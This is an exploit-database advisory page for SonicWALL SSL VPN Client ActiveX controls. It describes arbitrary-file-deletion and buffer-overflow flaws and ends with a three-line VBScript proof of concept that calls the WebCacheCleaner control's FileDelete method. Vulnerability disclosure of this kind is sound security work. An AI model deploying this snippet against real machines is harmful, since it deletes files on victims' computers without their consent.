header-logo
Suggest Exploit
vendor:
SSL VPN Client
by:
Unknown
7.5
CVSS
HIGH
Arbitrary-file-deletion and Stack-based buffer-overflow vulnerabilities
Unknown
CWE
Product Name: SSL VPN Client
Affected Version From: SonicWALL SSL VPN 1.3.0.3 software, WebCacheCleaner 1.3.0.3, NeLaunchCtrl 2.1.0.49 ActiveX controls
Affected Version To: Unknown
Patch Exists: NO
Related CWE: Unknown
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested: Windows
Unknown

Multiple Remote Vulnerabilities in SonicWALL SSL VPN Client

Attackers can execute arbitrary code within the context of the affected application and delete arbitrary files on the client's computer. Failed exploit attempts will result in denial-of-service conditions.

Mitigation:

Unknown
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/26288/info


SonicWALL SSL VPN Client is prone to multiple remote vulnerabilities. The issues occur in different ActiveX controls and include arbitrary-file-deletion and multiple stack-based buffer-overflow vulnerabilities.

Attackers can exploit these issues to execute arbitrary code within the context of the affected application and delete arbitrary files on the client's computer. Failed exploit attempts will result in denial-of-service conditions.

These issues affect SonicWALL SSL VPN 1.3.0.3 software as well as WebCacheCleaner 1.3.0.3 and NeLaunchCtrl 2.1.0.49 ActiveX controls; other versions may also be vulnerable. 

dim o
Set o = CreateObject("MLWebCacheCleaner.WebCacheCleaner.1")
o.FileDelete("c:\bla\bla")